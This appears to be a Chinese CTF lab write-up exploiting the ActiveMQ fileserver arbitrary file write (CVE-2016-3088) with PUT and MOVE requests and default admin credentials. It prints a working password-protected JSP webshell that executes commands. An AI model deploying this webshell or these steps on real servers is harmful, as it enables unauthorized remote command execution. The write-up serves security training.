墨者学院

WEB安全

ActiveMQ任意文件写入漏洞分析溯源

ActiveMQ 简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  1. 其使用率并不高

  2. 文件操作容易出现漏洞

漏洞复现

  1. 访问url

  1. 查找漏洞

    搜索发现存在CVE-2016-3088 漏洞,找到分析查看漏洞原因

    查询发现在ActiveMQ<5.12.x版本存在fileserver 应用,可以通过fileserver写入文件(不解析jsp文件)通过移动到任意位置,就可以造成任意文件写入漏洞。

    文件写入的几种利用方式

    1 写入webshell

    2 写入 cron 或 ssh key

    3 写入 jar 或 jetty.xml 等库和配置文件

    写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

  2. 漏洞利用

    尝试写入jsp

    有回显带密码验证的

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
     <% 
    if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
    out.println(new String(b));
    }
    out.print("</pre>");
    }
    %>
    请求url:http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls</pre>

    通过burp访问,发现需要验证,需要登录,我们尝试登录,默认的ActiveMQ的账号和密码均为admin

登录后查看http方法 ,发现没有put方法

执行put方法 发现却上传成功了

接下来通过move移动到admin或api下,就可以解析jsp文件了, 查找他的绝对路径

> 访问url:[http://ip:port/admin/test/systemProperties.jsp](http://ip:port/admin/test/systemProperties.jsp)
> 
> [图片上传失败...(image-99ffb1-1567592524169)]

通过move方法将jsp木马移动到admin或api下,进行解析

然后访问,可以执行命令,

这里就可以直接查看flag,最后在根目录找到了flag

参考链接

jsp一句话

ActiveMQ任意文件写入漏洞

相关文章
评论
分享
  • UNCTF竞技赛

    UNCTFwp由K&A整理 WEB简单的备忘录[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection](http...

    UNCTF竞技赛
  • SQL注入(时间盲注)

    了解盲注语法,如何利用盲注获取数据 目标 了解SQL时间盲注 掌握SQL注入语法 掌握SQL注入原理 了解SQL注入常用注释字符 本题使用的工具 sqlmap,hackbar环境 物理机:windows10 虚拟机:kali...

    SQL注入(时间盲注)
  • 实验吧-隐写-欢迎来到地狱

    多重隐写+加密,需要清醒的认识,才能不坠入地狱 实验吧隐写题欢迎来到地狱 解压 访问url,获取一个zip文件,解压发现存在3个文件 分别是jpg,doc,zip 根据文件名去,首先我们去打开第一个文件地狱伊始.jpg 打开提示文...

    实验吧-隐写-欢迎来到地狱
  • 实验吧-逆向工程-debug

    了解函数运行,合适添加断点判断,获取一闪而过的flag 实验吧逆向工程debug 下载文件,然后用idaq打开, 尝试在linux下打开发现么没有返回值, 在idaq里面去查看shift+F12 查看字符串,发现有个pri...

    实验吧-逆向工程-debug
  • 传统知识+古典密码

    多种加密结合,一步一步解密,追寻真理 实验吧密码学传统知识+古典密码 题目 辛卯,癸巳,丙戌,辛未,庚辰,癸酉,己卯,癸巳 信的背面还写有“+甲子”,请解出这段密文 key:CTF{} 查一下得到了一份六十甲子顺序表 获取...

    传统知识+古典密码
  • 变异凯撒

    仔细观察凯撒加密,找寻其中的规律 实验吧密码学变异凯撒 凯撒密码 在密码学中,恺撒密码(英语:Caesar cipher),或称恺撒加密、恺撒变换、变换加密,是一种最简单且最广为人知的加密技术。它是一种替换加密的技术,明文中的所有...

    变异凯撒
  • MD5之守株待兔

    实验吧-安全杂项-MD5之守株待兔 ,通过md5加密时间戳获取flag 实验吧安全杂项MD5之守株待兔,你需要找到和系统锁匹配的钥匙做题感受,这个题难道就只能一直刷新等吗,太不亲民了 访问url [http://ctf5.shi...

    MD5之守株待兔
  • HCTF2018-warmup-writeup

    BUUCTFwebwarmup这里我直接上代码讲 菜鸡不会php,全是现查 哪里不对,欢迎大佬指点 1234567891011121314151617181920212223242526272829303132333435363738...

    HCTF2018-warmup-writeup
  • 后台登录

    实验吧web后台登录 burp抓包尝试爆破 一般呢,ctf题是不涉及爆破的,因为这样会导致服务器处理压力太大 可以看到这里当我们输入正确的密码后,会返回flag。 那么我们的重点就是获取密码了 寻找密码 尝试了几次弱密码,注入都...

    后台登录
  • OWASP API Top 10

    OWASP API TOP 10本文搬运自:https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm TOP1:2019 —破碎的对...

    OWASP API Top 10
Please check the comment setting in config.yml of hexo-theme-Annie!